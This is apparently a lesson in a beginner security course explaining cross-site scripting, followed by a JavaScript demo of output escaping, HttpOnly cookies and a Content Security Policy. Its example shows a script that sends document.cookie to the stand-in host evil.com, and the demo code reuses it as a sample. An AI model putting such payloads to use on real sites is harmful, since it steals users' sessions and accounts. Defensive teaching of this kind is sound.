Injecting malicious scripts into websites
Day 88 of 149
The Graffiti Analogy
Imagine someone spray-painting a message on a public bulletin board.
Many people who read the board see the message as if it were official.
XSS is digital graffiti on websites!
How XSS Works
1. Attacker finds an input that gets displayed back on the page (for example, a comment box)
2. Instead of normal comment, they submit:
<script>steal(document.cookie)</script>
3. Website displays it as-is, without escaping or validating it
4. Victim visits page → their browser runs attacker's code!
5. Code steals cookies, redirects, etc.
Real Example
<!-- Vulnerable comment section -->
<div class="comment">Nice post!</div>
<div class="comment">
<script>
fetch("https://evil.com/steal?cookie=" + document.cookie);
</script>
</div>
When you view this page, YOUR cookies get stolen!
Types of XSS
| Type | Where Code Lives |
|---|---|
| Stored | In database (persists) |
| Reflected | In URL (one-time) |
| DOM-based | In JavaScript (client-side) |
Prevention
// Avoid inserting user input directly into HTML!
// Escape special characters so the browser shows them as text instead of running them:
"<script>" → "&lt;script&gt;"
Also use: Content Security Policy (limits which scripts the browser will run), HttpOnly cookies (JavaScript cannot read them, so document.cookie has nothing to steal)
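Here is the fix for the vulnerable comment section above, written out as a small added example (this is not code from the original post). It renders the post's own payload both the broken way and the escaped way, and builds the HttpOnly cookie and CSP headers mentioned in the prevention list. The function names (escapeHtml, renderCommentUnsafe, renderCommentSafe, sessionCookieHeader, cspHeader) are my own, and the sample comments are constructed for the demo.

```javascript
// Added example (not from the original post). Function names are assumptions.

// Map each HTML-significant character to its entity. With these replaced,
// user text can only ever be displayed as text, never parsed as markup.
const ENTITIES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

function escapeHtml(text) {
  // '&' must be in the set, otherwise an attacker could smuggle entities through.
  return String(text).replace(/[&<>"']/g, (ch) => ENTITIES[ch]);
}

// The bug from the post: raw user input concatenated straight into HTML.
function renderCommentUnsafe(text) {
  return `<div class="comment">${text}</div>`;
}

// The fix: escape first, then insert. The browser shows the tags as literal text.
function renderCommentSafe(text) {
  return `<div class="comment">${escapeHtml(text)}</div>`;
}

// HttpOnly keeps the session cookie out of document.cookie, so even a
// successful injection cannot read it. Secure and SameSite are the usual companions.
function sessionCookieHeader(name, value) {
  return `${name}=${encodeURIComponent(value)}; HttpOnly; Secure; SameSite=Lax; Path=/`;
}

// A Content Security Policy that only allows scripts carrying a server-issued
// nonce. An injected <script> tag has no nonce, so the browser refuses to run it.
function cspHeader(nonce) {
  return `default-src 'self'; script-src 'nonce-${nonce}'; object-src 'none'; base-uri 'none'`;
}

// Constructed sample input: the same payload as the post's "Real Example".
const attackerComment =
  '<script>fetch("https://evil.com/steal?cookie=" + document.cookie);</script>';
const normalComment = 'Nice post!';

function demo() {
  console.log('UNSAFE :', renderCommentUnsafe(attackerComment));
  console.log('SAFE   :', renderCommentSafe(attackerComment));
  console.log('SAFE   :', renderCommentSafe(normalComment));
  console.log('Set-Cookie:', sessionCookieHeader('sid', 'abc 123'));
  console.log('Content-Security-Policy:', cspHeader('r4nd0m'));
}

demo();
```

The unsafe line prints a live `<script>` element; the safe line prints `&lt;script&gt;...`, which a browser displays as the literal characters and never executes. Escaping on output is what closes the hole from the five-step list above; the cookie and CSP headers are defence in depth for the case where some other template forgets to escape.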
In One Sentence
XSS attacks inject malicious JavaScript into websites that runs in other users' browsers.